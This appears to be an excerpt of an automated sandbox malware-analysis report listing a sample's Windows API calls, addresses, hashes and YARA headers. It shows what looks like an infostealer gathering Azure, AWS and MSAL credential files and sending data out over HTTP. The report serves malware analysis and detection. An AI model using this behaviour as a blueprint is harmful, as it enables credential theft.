                        • Part of subcall function 04119097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 041190B9
                      • strtok_s.MSVCRT ref: 04110582
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 041105C9
                      • RtlAllocateHeap.NTDLL(00000000), ref: 041105D0
                      • StrStrA.SHLWAPI(00000000,00421618), ref: 041105EC
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 041105FA
                        • Part of subcall function 04118B47: malloc.MSVCRT ref: 04118B4F
                        • Part of subcall function 04118B47: strncpy.MSVCRT ref: 04118B6A
                      • StrStrA.SHLWAPI(00000000,00421620), ref: 04110636
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 04110644
                      • StrStrA.SHLWAPI(00000000,00421628), ref: 04110680
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0411068E
                      • StrStrA.SHLWAPI(00000000,00421630), ref: 041106CA
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 041106DC
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 04110769
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 04110781
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 04110799
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 041107B1
                      • lstrcat.KERNEL32(?,0042164C), ref: 041107C9
                      • lstrcat.KERNEL32(?,00421660), ref: 041107D8
                      • lstrcat.KERNEL32(?,00421670), ref: 041107E7
                      • lstrcat.KERNEL32(?,00000000), ref: 041107FA
                      • lstrcat.KERNEL32(?,00421678), ref: 04110809
                      • lstrcat.KERNEL32(?,00000000), ref: 0411081C
                      • lstrcat.KERNEL32(?,0042167C), ref: 0411082B
                      • lstrcat.KERNEL32(?,00421680), ref: 0411083A
                      • lstrcat.KERNEL32(?,00000000), ref: 0411084D
                      • lstrcat.KERNEL32(?,00421688), ref: 0411085C
                      • lstrcat.KERNEL32(?,0042168C), ref: 0411086B
                      • lstrcat.KERNEL32(?,00000000), ref: 0411087E
                      • lstrcat.KERNEL32(?,00421698), ref: 0411088D
                      • lstrcat.KERNEL32(?,0042169C), ref: 0411089C
                      • strtok_s.MSVCRT ref: 041108E0
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 041108F5
                      • memset.MSVCRT ref: 04110944
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                      • String ID:
                      • API String ID: 3689735781-0
                      • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                      • Instruction ID: 46d8c3af477bde6569087a301aab3677877651989313da647c1f29bb5ba37a45
                      • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                      • Instruction Fuzzy Hash: 8AD17C75E41208ABDB04FBF0DDD5EEEBB39BF58340F504429E106A60A0EB74BA45CB65
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                      • StrCmpCA.SHLWAPI(?,0251CF40), ref: 00405A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0254E928,00000000,?,02519420,00000000,?,00421A1C), ref: 00405E71
                      • lstrlenA.KERNEL32(00000000), ref: 00405E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                      • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                      • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                      • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                      • memcpy.MSVCRT(?), ref: 00405EFE
                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                      • HttpOpenRequestA.WININET(00000000,0254E828,?,0254DDD0,00000000,00000000,00400100,00000000), ref: 00405BF8
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 1406981993-2180234286
                      • Opcode ID: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                      • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                      • Opcode Fuzzy Hash: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                      • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                      APIs
                      • memset.MSVCRT ref: 00414D87
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                      • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                      • memset.MSVCRT ref: 00414E13
                      • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                      • memset.MSVCRT ref: 00414E9F
                      • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0251D020,?,000003E8), ref: 00414A4A
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                      • memset.MSVCRT ref: 00414F2B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                      • API String ID: 4017274736-156832076
                      • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                      • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                      • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                      • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                      • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                      • lstrcatA.KERNEL32(?,00000000,0251CD50,00421474,0251CD50,00421470,00000000), ref: 0040D208
                      • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                      • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                      • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                      • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                      • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                      • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                      • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      • lstrlenA.KERNEL32(?), ref: 0040D32A
                      • lstrlenA.KERNEL32(?), ref: 0040D339
                      • memset.MSVCRT ref: 0040D388
                        • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                      • String ID:
                      • API String ID: 2775534915-0
                      • Opcode ID: e5c82e9ce1cff54def9452100ba7adfec63f1896f9946f1ad76391bd4ac86753
                      • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                      • Opcode Fuzzy Hash: e5c82e9ce1cff54def9452100ba7adfec63f1896f9946f1ad76391bd4ac86753
                      • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0410D1EA
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0410D32E
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0410D335
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D46F
                      • lstrcat.KERNEL32(?,00421478), ref: 0410D47E
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D491
                      • lstrcat.KERNEL32(?,0042147C), ref: 0410D4A0
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D4B3
                      • lstrcat.KERNEL32(?,00421480), ref: 0410D4C2
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D4D5
                      • lstrcat.KERNEL32(?,00421484), ref: 0410D4E4
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D4F7
                      • lstrcat.KERNEL32(?,00421488), ref: 0410D506
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D519
                      • lstrcat.KERNEL32(?,0042148C), ref: 0410D528
                      • lstrcat.KERNEL32(?,00000000), ref: 0410D53B
                      • lstrcat.KERNEL32(?,00421490), ref: 0410D54A
                        • Part of subcall function 0411AA87: lstrlen.KERNEL32(0410516C,?,?,0410516C,00420DDE), ref: 0411AA92
                        • Part of subcall function 0411AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0411AAEC
                      • lstrlen.KERNEL32(?), ref: 0410D591
                      • lstrlen.KERNEL32(?), ref: 0410D5A0
                      • memset.MSVCRT ref: 0410D5EF
                        • Part of subcall function 0411ACD7: StrCmpCA.SHLWAPI(0064A350,0410AA0E,?,0410AA0E,0064A350), ref: 0411ACF6
                      • DeleteFileA.KERNEL32(00000000), ref: 0410D61B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                      • String ID:
                      • API String ID: 1973479514-0
                      • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                      • Instruction ID: 075f01b970e2982c5c8f100a51e7b2e876627e1eaf8d0227454faff304b9d5ca
                      • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                      • Instruction Fuzzy Hash: C1E16E75941108ABDB08FBE0EDD4EEE7B79BF54345F504169E10AA20A0EF34BA08CF61
                      APIs
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A51
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A68
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A7F
                        • Part of subcall function 04104A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04104AA0
                        • Part of subcall function 04104A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 04104AB0
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04105C5F
                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 04105C7A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04105DFA
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 041060D8
                      • lstrlen.KERNEL32(00000000), ref: 041060E9
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 041060FA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04106101
                      • lstrlen.KERNEL32(00000000), ref: 04106116
                      • memcpy.MSVCRT(?,00000000,00000000), ref: 0410612D
                      • lstrlen.KERNEL32(00000000), ref: 0410613F
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 04106158
                      • memcpy.MSVCRT(?), ref: 04106165
                      • lstrlen.KERNEL32(00000000,?,?), ref: 04106182
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 04106196
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 041061B3
                      • InternetCloseHandle.WININET(00000000), ref: 04106217
                      • InternetCloseHandle.WININET(00000000), ref: 04106224
                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 04105E5F
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • InternetCloseHandle.WININET(00000000), ref: 0410622E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                      • String ID:
                      • API String ID: 1703137719-0
                      • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                      • Instruction ID: 68a7dff7cae52328d3c55a48708dc5345634bb423fcf8f4c3492f23e06fb36a5
                      • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                      • Instruction Fuzzy Hash: 4612E071961218ABDB15EBA0DDD4FEEBB79BF54744F4041A9A10A620A0EF703F88CF54
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0254CB70,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                      • StrStrA.SHLWAPI(?,0254CC48,00420B52), ref: 0040CAF7
                      • StrStrA.SHLWAPI(00000000,0254CC60), ref: 0040CB1E
                      • StrStrA.SHLWAPI(?,0254D690,00000000,?,00421458,00000000,?,00000000,00000000,?,0251CE00,00000000,?,00421454,00000000,?), ref: 0040CCA2
                      • StrStrA.SHLWAPI(00000000,0254D450), ref: 0040CCB9
                        • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                        • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0251CD40), ref: 0040C871
                        • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                        • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                      • StrStrA.SHLWAPI(?,0254D450,00000000,?,0042145C,00000000,?,00000000,0251CD40), ref: 0040CD5A
                      • StrStrA.SHLWAPI(00000000,0251CF80), ref: 0040CD71
                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                      • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                      • String ID:
                      • API String ID: 3555725114-3916222277
                      • Opcode ID: 67a11b83531c4f912b4f854bc23071d1f9f4bfbabab22afa5656f5011e2aa8d6
                      • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                      • Opcode Fuzzy Hash: 67a11b83531c4f912b4f854bc23071d1f9f4bfbabab22afa5656f5011e2aa8d6
                      • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0410CCD3
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0410CCF0
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0410CCFC
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0410CD0F
                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0410CD1C
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0410CD40
                      • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0410CD5E
                      • StrStrA.SHLWAPI(00000000,0064A364), ref: 0410CD85
                      • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0410CF09
                      • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0410CF20
                        • Part of subcall function 0410CA87: memset.MSVCRT ref: 0410CABA
                        • Part of subcall function 0410CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0410CAD8
                        • Part of subcall function 0410CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0410CAE3
                        • Part of subcall function 0410CA87: memcpy.MSVCRT(?,?,?), ref: 0410CB79
                      • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0410CFC1
                      • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0410CFD8
                        • Part of subcall function 0410CA87: lstrcat.KERNEL32(?,00420B46), ref: 0410CBAA
                        • Part of subcall function 0410CA87: lstrcat.KERNEL32(?,00420B47), ref: 0410CBBE
                        • Part of subcall function 0410CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0410CBDF
